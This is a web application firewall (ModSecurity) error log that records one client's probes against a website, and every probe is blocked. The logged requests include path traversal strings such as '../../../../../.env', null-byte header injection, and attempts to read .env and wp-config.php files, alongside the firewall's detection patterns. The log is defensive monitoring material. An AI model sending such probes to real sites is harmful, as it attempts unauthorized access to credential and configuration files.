[Tue May 12 04:39:17.215086 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:17.215149 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:17.215178 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:17.215207 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:17.215830 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 16)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:17.256586 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.166:56982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS09r1yOh9TvizeziPzAAAAEs"]
[Tue May 12 04:39:17.274629 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS1Xo6NvB9WXx5V-6e1AAAAQE"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:17.274840 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKS1Xo6NvB9WXx5V-6e1AAAAQE"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:17.958509 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1AgpmE1yW0glLdgfKQAAAMI"], referer: https://tchatbooster.com/static../../.env.production
[Tue May 12 04:39:17.988803 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS1QgpmE1yW0glLdgfLAAAAMY"]
[Tue May 12 04:39:17.988913 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS1QgpmE1yW0glLdgfLAAAAMY"]
[Tue May 12 04:39:17.989085 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS1QgpmE1yW0glLdgfLAAAAMY"]
[Tue May 12 04:39:18.459663 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.166:37388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 16 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1c1tk6y7yBJLpJopoQAAAIw"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:39:18.482912 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.482964 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.482989 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.483213 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.483276 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.483309 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.483697 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:18.563750 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1Xo6NvB9WXx5V-6e1AAAAQE"], referer: https://tchatbooster.com/.env.backup
[Tue May 12 04:39:18.589107 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS1ggpmE1yW0glLdgfLwAAAMw"]
[Tue May 12 04:39:18.589345 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS1ggpmE1yW0glLdgfLwAAAMw"]
[Tue May 12 04:39:19.066718 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:57192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1QgpmE1yW0glLdgfLAAAAMY"]
[Tue May 12 04:39:19.086059 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS13o6NvB9WXx5V-6e2AAAAQE"], referer: https://tchatbooster.com/static../../wp-config.php
[Tue May 12 04:39:19.086282 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.166:37396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS13o6NvB9WXx5V-6e2AAAAQE"], referer: https://tchatbooster.com/static../../wp-config.php
[Tue May 12 04:39:19.227987 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:57178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1jue9Sp-pIv_Bb61OgAAAUU"]
[Tue May 12 04:39:19.247998 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248057 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248081 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248109 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248334 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248398 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248449 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.248905 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:57220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKS1wgpmE1yW0glLdgfMAAAAMI"], referer: https://tchatbooster.com/api/health?X-App-Env=%00
[Tue May 12 04:39:19.345128 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:57172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS1ggpmE1yW0glLdgfLwAAAMw"]
